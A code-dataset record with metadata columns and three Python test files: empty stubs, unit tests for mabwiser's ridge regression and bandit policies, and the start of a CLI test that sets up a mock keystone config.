| 7
|
fc1689c842711ac8caa62d2bde2fc7a2a958485f
| 140
|
py
|
Python
|
tests/extract/test_transfer_info.py
|
akudan/purr
|
ca6a57217a2cd83fb267d06e8a77657e213f73ce
|
[
"MIT"
] | 4
|
2019-11-14T18:15:42.000Z
|
2022-03-22T22:23:35.000Z
|
tests/extract/test_transfer_info.py
|
akudan/purr
|
ca6a57217a2cd83fb267d06e8a77657e213f73ce
|
[
"MIT"
] | 1
|
2020-01-17T22:33:53.000Z
|
2020-01-29T21:53:51.000Z
|
tests/extract/test_transfer_info.py
|
akudan/purr
|
ca6a57217a2cd83fb267d06e8a77657e213f73ce
|
[
"MIT"
] | 1
|
2021-07-07T19:31:26.000Z
|
2021-07-07T19:31:26.000Z
|
def test_create_stat_table():
pass
def test_get_latest_successful_ts():
pass
def test_update_latest_successful_ts():
pass
| 10.769231
| 39
| 0.742857
| 20
| 140
| 4.65
| 0.55
| 0.225806
| 0.236559
| 0.473118
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.192857
| 140
| 12
| 40
| 11.666667
| 0.823009
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
fc31b71922b0abe2403d6c1e41963784601763ad
| 29,338
|
py
|
Python
|
tests/test_ridge.py
|
ncilfone/mabwiser
|
329125d4110312d6001e9486e1cb3490a90565c4
|
[
"Apache-2.0"
] | 31
|
2019-06-14T12:26:44.000Z
|
2020-05-17T19:04:35.000Z
|
tests/test_ridge.py
|
ncilfone/mabwiser
|
329125d4110312d6001e9486e1cb3490a90565c4
|
[
"Apache-2.0"
] | 4
|
2019-12-16T08:41:28.000Z
|
2020-05-27T21:32:11.000Z
|
tests/test_ridge.py
|
ncilfone/mabwiser
|
329125d4110312d6001e9486e1cb3490a90565c4
|
[
"Apache-2.0"
] | 6
|
2019-06-16T13:08:41.000Z
|
2020-04-17T01:57:14.000Z
|
# -*- coding: utf-8 -*-
import math
import numpy as np
from sklearn.preprocessing import StandardScaler
from mabwiser.mab import LearningPolicy
from mabwiser.linear import _RidgeRegression
from tests.test_base import BaseTest
class RidgeRegressionTest(BaseTest):
def test_predict_ridge(self):
context = np.array([[1, 0, 2, 1, 1], [3, 1, 2, 3, 4], [2, -1, 1, 0, 2]])
rewards = np.array([3, 3, 1])
rng = np.random.RandomState(seed=7)
ridge = _RidgeRegression(rng, l2_lambda=1.0, alpha=1.0, scale=False)
ridge.init(context.shape[1])
ridge.fit(context, rewards)
prediction = ridge.predict(np.array([0, 1, 2, 3, 5]))
self.assertTrue(math.isclose(prediction, 2.8167701863354, abs_tol=1e-8))
def test_predict_ridge_scaler(self):
context = np.array([[1, 0, 2, 1, 1], [3, 1, 2, 3, 4], [2, -1, 1, 0, 2]])
rewards = np.array([3, 3, 1])
rng = np.random.RandomState(seed=7)
scaler = StandardScaler()
scaler.fit(context.astype('float64'))
ridge = _RidgeRegression(rng, l2_lambda=1.0, alpha=1.0, scale=True)
ridge.init(context.shape[1])
ridge.fit(context, rewards)
prediction = ridge.predict(np.array([0, 1, 2, 3, 5]))
self.assertTrue(math.isclose(prediction, 1.1429050092142725, abs_tol=1e-8))
def test_fit(self):
context = np.array([[1, 0, 2, 1, 1], [3, 1, 2, 3, 4], [2, -1, 1, 0, 2]])
rewards = np.array([3, 3, 1])
decisions = np.array([1, 1, 1])
arms, mab = self.predict(arms=[0, 1],
decisions=decisions,
rewards=rewards,
learning_policy=LearningPolicy.LinUCB(alpha=1),
context_history=context,
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
self.assertEqual(mab._imp.num_features, 5)
self.assertEqual(arms, [0, 0])
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[0], 0.09161491, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[1], 0.00310559, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[2], 0.97515528, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[3], 0.32142857, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[4], -0.02018634, abs_tol=0.00000001))
context2 = np.array([[1, 0, 2, 1, 1], [3, 1, 2, 3, 4], [2, -1, 1, 0, 2], [-1, 4, 2, 0, 1],
[2, 2, 2, 2, 2], [3, 2, 1, 2, 3], [0, 0, 0, 0, 0], [2, 1, 1, 1, 2],
[3, 2, 3, 2, 3], [8, 2, 3, 1, 0], [1, 2, -9, -7, 1], [0, 1, 1, 1, 1]])
rewards2 = np.array([3, 3, 1, 0, -1, 2, 1, 2, 1, 1, 0, 3])
decisions2 = np.array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1])
arms, mab = self.predict(arms=[0, 1],
decisions=decisions2,
rewards=rewards2,
learning_policy=LearningPolicy.LinUCB(alpha=1),
context_history=context2,
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
self.assertEqual(mab._imp.num_features, 5)
self.assertEqual(arms, [0, 0])
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[0], 0.09927202, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[1], -0.17141953, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[2], 0.09091367, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[3], -0.03705452, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[4], 0.59027579, abs_tol=0.00000001))
def test_fit_twice(self):
context = np.array([[1, 0, 2, 1, 1], [3, 1, 2, 3, 4], [2, -1, 1, 0, 2]])
rewards = np.array([3, 3, 1])
decisions = np.array([1, 1, 1])
arms, mab = self.predict(arms=[0, 1],
decisions=decisions,
rewards=rewards,
learning_policy=LearningPolicy.LinUCB(alpha=1),
context_history=context,
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
self.assertEqual(mab._imp.num_features, 5)
self.assertEqual(arms, [0, 0])
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[0], 0.09161491, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[1], 0.00310559, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[2], 0.97515528, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[3], 0.32142857, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[4], -0.02018634, abs_tol=0.00000001))
context2 = np.array([[1, 0, 2, 1, 1], [3, 1, 2, 3, 4], [2, -1, 1, 0, 2], [-1, 4, 2, 0, 1],
[2, 2, 2, 2, 2], [3, 2, 1, 2, 3], [0, 0, 0, 0, 0], [2, 1, 1, 1, 2],
[3, 2, 3, 2, 3], [8, 2, 3, 1, 0], [1, 2, -9, -7, 1], [0, 1, 1, 1, 1],
[0, 2, 9, 5, 1]])
rewards2 = np.array([3, 3, 1, 0, -1, 2, 1, 2, 1, 1, 0, 3, 1])
decisions2 = np.array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0])
mab.fit(decisions2, rewards2, context2)
arms = mab.predict([[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]])
self.assertEqual(arms, [0, 0])
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[0], 0.09927202, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[1], -0.17141953, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[2], 0.09091367, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[3], -0.03705452, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[4], 0.59027579, abs_tol=0.00000001))
def test_partial_fit(self):
context = np.array([[1, 0, 0, 0, 1], [0, 1, 2, 3, 4], [2, 0, 1, 0, 2]])
rewards = np.array([3, 2, 1])
decisions = np.array([1, 1, 1])
arms, mab = self.predict(arms=[0, 1],
decisions=decisions,
rewards=rewards,
learning_policy=LearningPolicy.LinUCB(alpha=1),
context_history=context,
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
self.assertEqual(mab._imp.num_features, 5)
self.assertEqual(arms, [0, 0])
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[0], 0.47619048, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[1], 0.04761905, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[2], -0.5952381, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[3], 0.14285714, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[4], 0.66666667, abs_tol=0.00000001))
self.assertEqual(mab._imp.arm_to_model[0].beta[0], 0)
self.assertEqual(mab._imp.arm_to_model[0].beta[1], 0)
self.assertEqual(mab._imp.arm_to_model[0].beta[2], 0)
self.assertEqual(mab._imp.arm_to_model[0].beta[3], 0)
self.assertEqual(mab._imp.arm_to_model[0].beta[4], 0)
context2 = np.array([[2, 1, 2, 1, 2], [3, 3, 3, 2, 1], [1, 1, 1, 1, 1]])
rewards2 = np.array([1, 1, 1])
decisions2 = np.array([0, 0, 1])
mab.partial_fit(decisions2, rewards2, context2)
self.assertEqual(mab._imp.num_features, 5)
self.assertTrue(math.isclose(mab._imp.arm_to_model[0].beta[0], 0.11940299, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[0].beta[1], 0.01492537, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[0].beta[2], 0.11940299, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[0].beta[3], 0.04477612, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[0].beta[4], 0.17910448, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[0], 0.53019146, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[1], 0.13402062, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[2], -0.56553756, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[3], 0.17525773, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[4], 0.61266568, abs_tol=0.00000001))
def test_partial_vs_batch_fit(self):
# Batch fit
context_batch = np.array([[1, 0, 0, 0, 1], [0, 1, 2, 3, 4], [2, 0, 1, 0, 2],
[2, 1, 2, 1, 2], [3, 3, 3, 2, 1], [1, 1, 1, 1, 1]])
rewards_batch = np.array([0, 1, 1, 0, 1, 0])
decisions_batch = np.array([1, 1, 1, 0, 0, 1])
arms_batch, mab_batch = self.predict(arms=[0, 1],
decisions=decisions_batch,
rewards=rewards_batch,
learning_policy=LearningPolicy.LinUCB(alpha=1),
context_history=context_batch,
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
# Partial fit
context = np.array([[1, 0, 0, 0, 1], [0, 1, 2, 3, 4], [2, 0, 1, 0, 2]])
rewards = np.array([0, 1, 1])
decisions = np.array([1, 1, 1])
arms_partial, mab_partial = self.predict(arms=[0, 1],
decisions=decisions,
rewards=rewards,
learning_policy=LearningPolicy.LinUCB(alpha=1),
context_history=context,
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
context2 = np.array([[2, 1, 2, 1, 2], [3, 3, 3, 2, 1], [1, 1, 1, 1, 1]])
rewards2 = np.array([0, 1, 0])
decisions2 = np.array([0, 0, 1])
mab_partial.partial_fit(decisions2, rewards2, context2)
self.assertListEqual(mab_batch._imp.arm_to_model[0].beta.tolist(),
mab_partial._imp.arm_to_model[0].beta.tolist())
self.assertListEqual(mab_batch._imp.arm_to_model[0].Xty.tolist(), mab_partial._imp.arm_to_model[0].Xty.tolist())
self.assertListEqual(mab_batch._imp.arm_to_model[0].A_inv.tolist(),
mab_partial._imp.arm_to_model[0].A_inv.tolist())
self.assertListEqual(mab_batch._imp.arm_to_model[1].beta.tolist(),
mab_partial._imp.arm_to_model[1].beta.tolist())
self.assertListEqual(mab_batch._imp.arm_to_model[1].Xty.tolist(), mab_partial._imp.arm_to_model[1].Xty.tolist())
self.assertListEqual(mab_batch._imp.arm_to_model[1].A_inv.tolist(),
mab_partial._imp.arm_to_model[1].A_inv.tolist())
def test_partial_different_order(self):
# Batch fit
context_batch = np.array([[1, 0, 0, 0, 1], [0, 1, 2, 3, 4], [2, 0, 1, 0, 2],
[2, 1, 2, 1, 2], [3, 3, 3, 2, 1], [1, 1, 1, 1, 1]])
rewards_batch = np.array([0, 1, 1, 0, 1, 0])
decisions_batch = np.array([1, 1, 1, 0, 0, 1])
arms_batch, mab_batch = self.predict(arms=[0, 1],
decisions=decisions_batch,
rewards=rewards_batch,
learning_policy=LearningPolicy.LinUCB(alpha=1),
context_history=context_batch,
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
# Partial fit
context = np.array([[2, 1, 2, 1, 2], [3, 3, 3, 2, 1], [1, 1, 1, 1, 1]])
rewards = np.array([0, 1, 0])
decisions = np.array([0, 0, 1])
arms_partial, mab_partial = self.predict(arms=[0, 1],
decisions=decisions,
rewards=rewards,
learning_policy=LearningPolicy.LinUCB(alpha=1),
context_history=context,
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
context2 = np.array([[1, 0, 0, 0, 1], [0, 1, 2, 3, 4], [2, 0, 1, 0, 2]])
rewards2 = np.array([0, 1, 1])
decisions2 = np.array([1, 1, 1])
mab_partial.partial_fit(decisions2, rewards2, context2)
self.assertListEqual(mab_batch._imp.arm_to_model[0].beta.tolist(),
mab_partial._imp.arm_to_model[0].beta.tolist())
self.assertListEqual(mab_batch._imp.arm_to_model[0].Xty.tolist(), mab_partial._imp.arm_to_model[0].Xty.tolist())
self.assertListEqual(mab_batch._imp.arm_to_model[0].A_inv.tolist(),
mab_partial._imp.arm_to_model[0].A_inv.tolist())
self.assertListEqual(mab_batch._imp.arm_to_model[1].beta.tolist(),
mab_partial._imp.arm_to_model[1].beta.tolist())
self.assertListEqual(mab_batch._imp.arm_to_model[1].Xty.tolist(), mab_partial._imp.arm_to_model[1].Xty.tolist())
self.assertListEqual(mab_batch._imp.arm_to_model[1].A_inv.tolist(),
mab_partial._imp.arm_to_model[1].A_inv.tolist())
def test_batch_vs_3_partial_fit(self):
# Batch fit
context_batch = np.array([[1, 0, 0, 0, 1], [0, 1, 2, 3, 4], [2, 0, 1, 0, 2],
[2, 1, 2, 1, 2], [3, 3, 3, 2, 1], [1, 1, 1, 1, 1],
[2, 2, 2, 2, 1], [1, 2, 3, 1, 1]])
rewards_batch = np.array([0, 1, 1, 0, 1, 0, 1, 1])
decisions_batch = np.array([1, 1, 1, 0, 0, 1, 0, 0])
arms_batch, mab_batch = self.predict(arms=[0, 1],
decisions=decisions_batch,
rewards=rewards_batch,
learning_policy=LearningPolicy.LinUCB(alpha=1),
context_history=context_batch,
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
# Partial fit
context = np.array([[2, 2, 2, 2, 1], [1, 2, 3, 1, 1]])
rewards = np.array([1, 1])
decisions = np.array([0, 0])
arms_partial, mab_partial = self.predict(arms=[0, 1],
decisions=decisions,
rewards=rewards,
learning_policy=LearningPolicy.LinUCB(alpha=1),
context_history=context,
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
context2 = np.array([[1, 0, 0, 0, 1], [0, 1, 2, 3, 4], [2, 0, 1, 0, 2]])
rewards2 = np.array([0, 1, 1])
decisions2 = np.array([1, 1, 1])
context3 = np.array([[2, 1, 2, 1, 2], [3, 3, 3, 2, 1], [1, 1, 1, 1, 1]])
rewards3 = np.array([0, 1, 0])
decisions3 = np.array([0, 0, 1])
mab_partial.partial_fit(decisions2, rewards2, context2)
mab_partial.partial_fit(decisions3, rewards3, context3)
self.assertListEqual(mab_batch._imp.arm_to_model[0].beta.tolist(),
mab_partial._imp.arm_to_model[0].beta.tolist())
self.assertListEqual(mab_batch._imp.arm_to_model[0].Xty.tolist(), mab_partial._imp.arm_to_model[0].Xty.tolist())
self.assertListEqual(mab_batch._imp.arm_to_model[0].A_inv.tolist(),
mab_partial._imp.arm_to_model[0].A_inv.tolist())
self.assertListEqual(mab_batch._imp.arm_to_model[1].beta.tolist(),
mab_partial._imp.arm_to_model[1].beta.tolist())
self.assertListEqual(mab_batch._imp.arm_to_model[1].Xty.tolist(), mab_partial._imp.arm_to_model[1].Xty.tolist())
self.assertListEqual(mab_batch._imp.arm_to_model[1].A_inv.tolist(),
mab_partial._imp.arm_to_model[1].A_inv.tolist())
def test_l2_low(self):
context = np.array([[1, 1, 0, 0, 1], [0, 1, 2, 9, 4], [2, 3, 1, 0, 2]])
rewards = np.array([3, 2, 1])
decisions = np.array([1, 1, 1])
arms, mab = self.predict(arms=[0, 1],
decisions=decisions,
rewards=rewards,
learning_policy=LearningPolicy.LinUCB(alpha=1, l2_lambda=0.1),
context_history=context,
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
self.assertEqual(mab._imp.num_features, 5)
self.assertEqual(arms, [1, 1])
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[0], 1.59499705, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[1], -0.91856183, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[2], -2.49775977, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[3], 0.14219195, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[4], 1.65819347, abs_tol=0.00000001))
def test_l2_high(self):
context = np.array([[1, 1, 0, 0, 1], [0, 1, 2, 9, 4], [2, 3, 1, 0, 2]])
rewards = np.array([3, 2, 1])
decisions = np.array([1, 1, 1])
arms, mab = self.predict(arms=[0, 1],
decisions=decisions,
rewards=rewards,
learning_policy=LearningPolicy.LinUCB(alpha=1, l2_lambda=10),
context_history=context,
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
self.assertEqual(mab._imp.num_features, 5)
self.assertEqual(arms, [0, 0])
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[0], 0.18310155, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[1], 0.16372811, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[2], -0.00889076, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[3], 0.09434416, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[4], 0.22503229, abs_tol=0.00000001))
def test_l2_0(self):
context = np.array([[1, 0, 2, 1, 1], [3, 1, 2, 3, 4], [2, -1, 1, 0, 2], [-1, 4, 2, 0, 1],
[2, 2, 2, 2, 2], [3, 2, 1, 2, 3], [0, 0, 0, 0, 0], [2, 1, 1, 1, 2],
[3, 2, 3, 2, 3], [8, 2, 3, 1, 0], [1, 2, -9, -7, 1], [0, 1, 1, 1, 1]])
rewards = np.array([3, 3, 1, 0, -1, 2, 1, 2, 1, 1, 0, 3])
decisions = np.array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1])
arms, mab = self.predict(arms=[0, 1],
decisions=decisions,
rewards=rewards,
learning_policy=LearningPolicy.LinUCB(alpha=1, l2_lambda=0),
context_history=context,
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
self.assertEqual(mab._imp.num_features, 5)
self.assertEqual(arms, [1, 1])
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[0], 0.09224215, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[1], -0.20569848, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[2], 0.13434242, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[3], -0.1000045, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[4], 0.63726682, abs_tol=0.00000001))
context2 = np.array([[1, 0, 2, 1, 1], [3, 1, 2, 3, 4], [2, -1, 1, 0, 2], [-1, 4, 2, 0, 1], [1, 2, 3, 4, 5]])
rewards2 = np.array([-1, 2, 1, 2, 0])
decisions2 = np.array([1, 1, 1, 1, 1])
mab.fit(decisions2, rewards2, context2)
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[0], 0.97297297, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[1], 1.05405405, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[2], -0.86486486, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[3], -0.72972973, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[4], 0.48648649, abs_tol=0.00000001))
def test_fit_twice_new_features(self):
context = np.array([[1, 0, 2, 1, 1], [3, 1, 2, 3, 4], [2, -1, 1, 0, 2], [-1, 4, 2, 0, 1],
[2, 2, 2, 2, 2], [3, 2, 1, 2, 3], [0, 0, 0, 0, 0], [2, 1, 1, 1, 2],
[3, 2, 3, 2, 3], [8, 2, 3, 1, 0], [1, 2, -9, -7, 1], [0, 1, 1, 1, 1]])
rewards = np.array([3, 3, 1, 0, -1, 2, 1, 2, 1, 1, 0, 3])
decisions = np.array([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1])
arms, mab = self.predict(arms=[0, 1],
decisions=decisions,
rewards=rewards,
learning_policy=LearningPolicy.LinUCB(alpha=1, l2_lambda=0),
context_history=context,
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
self.assertEqual(mab._imp.num_features, 5)
self.assertEqual(arms, [1, 1])
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[0], 0.09224215, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[1], -0.20569848, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[2], 0.13434242, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[3], -0.1000045, abs_tol=0.00000001))
self.assertTrue(math.isclose(mab._imp.arm_to_model[1].beta[4], 0.63726682, abs_tol=0.00000001))
context2 = np.array([[1, 0, 2, 1, 1, 3], [3, 1, 2, 3, 4, 1], [2, -1, 1, 0, 2, 2], [-1, 4, 2, 0, 1, 0],
[1, 2, 3, 4, 5, 1]])
rewards2 = np.array([-1, 2, 1, 2, 0])
decisions2 = np.array([1, 1, 1, 1, 1])
mab.fit(decisions2, rewards2, context2)
self.assertEqual(mab._imp.num_features, 6)
def test_add_arm(self):
context = np.array([[1, 0, 2, 1, 1], [3, 1, 2, 3, 4], [2, -1, 1, 0, 2]])
rewards = np.array([3, 3, 1])
decisions = np.array([1, 1, 1])
arms, mab = self.predict(arms=[0, 1],
decisions=decisions,
rewards=rewards,
learning_policy=LearningPolicy.LinUCB(alpha=1),
context_history=context,
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=1,
is_predict=True)
self.assertEqual(mab._imp.num_features, 5)
self.assertEqual(arms, [0, 0])
mab.add_arm(2)
self.assertTrue(2 in mab._imp.arm_to_model.keys())
self.assertEqual(mab._imp.arm_to_model[2].beta[0], 0)
self.assertEqual(mab._imp.arm_to_model[2].beta[1], 0)
self.assertEqual(mab._imp.arm_to_model[2].beta[2], 0)
self.assertEqual(mab._imp.arm_to_model[2].beta[3], 0)
self.assertEqual(mab._imp.arm_to_model[2].beta[4], 0)
def test_remove_arm(self):
arm, mab = self.predict(arms=[1, 2, 3],
decisions=[1, 1, 1, 3, 2, 2, 3, 1, 3, 1],
rewards=[0, 1, 1, 0, 1, 0, 1, 1, 1, 1],
learning_policy=LearningPolicy.LinTS(alpha=0.24),
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=4,
is_predict=True)
mab.remove_arm(3)
self.assertTrue(3 not in mab.arms)
self.assertTrue(3 not in mab._imp.arms)
self.assertTrue(3 not in mab._imp.arm_to_expectation)
self.assertTrue(3 not in mab._imp.arm_to_model)
def test_warm_start(self):
_, mab = self.predict(arms=[1, 2, 3],
decisions=[1, 1, 1, 1, 2, 2, 2, 1, 2, 1],
rewards=[0, 1, 1, 0, 1, 0, 1, 1, 1, 1],
learning_policy=LearningPolicy.LinTS(alpha=0.24),
context_history=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0],
[0, 2, 2, 3, 5], [1, 3, 1, 1, 1], [0, 0, 0, 0, 0],
[0, 1, 4, 3, 5], [0, 1, 2, 4, 5], [1, 2, 1, 1, 3],
[0, 2, 1, 0, 0]],
contexts=[[0, 1, 2, 3, 5], [1, 1, 1, 1, 1]],
seed=123456,
num_run=4,
is_predict=True)
# Before warm start
self.assertEqual(mab._imp.trained_arms, [1, 2])
self.assertDictEqual(mab._imp.arm_to_expectation, {1: 0.0, 2: 0.0, 3: 0.0})
self.assertListAlmostEqual(mab._imp.arm_to_model[1].beta, [0.19635284, 0.11556404, 0.57675997, 0.30597964, -0.39100933])
self.assertListAlmostEqual(mab._imp.arm_to_model[3].beta, [0, 0, 0, 0, 0])
# Warm start
mab.warm_start(arm_to_features={1: [0, 1], 2: [0, 0], 3: [0.5, 0.5]}, distance_quantile=0.5)
self.assertListAlmostEqual(mab._imp.arm_to_model[3].beta, [0.19635284, 0.11556404, 0.57675997, 0.30597964, -0.39100933])
| 56.527938
| 128
| 0.492535
| 4,080
| 29,338
| 3.385784
| 0.041176
| 0.040104
| 0.036485
| 0.104459
| 0.928116
| 0.914941
| 0.908933
| 0.898943
| 0.883958
| 0.874113
| 0
| 0.154182
| 0.352035
| 29,338
| 519
| 129
| 56.527938
| 0.572488
| 0.003954
| 0
| 0.72
| 0
| 0
| 0.00024
| 0
| 0
| 0
| 0
| 0
| 0.284706
| 1
| 0.035294
| false
| 0
| 0.014118
| 0
| 0.051765
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fc7a9bea85936ee4bf5630a996f1753df0a4b812
| 10,629
|
py
|
Python
|
sanity/tests/test_cli.py
|
CiscoCloud/sdu-test-sanity
|
9653ab953bedff015737f99b75ae5b5bb490894c
|
[
"Apache-2.0"
] | null | null | null |
sanity/tests/test_cli.py
|
CiscoCloud/sdu-test-sanity
|
9653ab953bedff015737f99b75ae5b5bb490894c
|
[
"Apache-2.0"
] | null | null | null |
sanity/tests/test_cli.py
|
CiscoCloud/sdu-test-sanity
|
9653ab953bedff015737f99b75ae5b5bb490894c
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright 2015-2016 Cisco Systems, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from unittest import TestCase
import Queue
import mock
from sanity import cli
from sanity import scenarios
class AttrDict(dict):
def __init__(self, *args, **kwargs):
super(AttrDict, self).__init__(*args, **kwargs)
self.__dict__ = self
class TestTesterThread(TestCase):
def setup_conf(self, conf, **kwargs):
conf.keystone = AttrDict()
conf.keystone.auth_url = 'mock://localhost'
conf.keystone.tenant_name = 'mock_tenant'
conf.keystone.username = 'mock_username'
conf.keystone.password = 'secret'
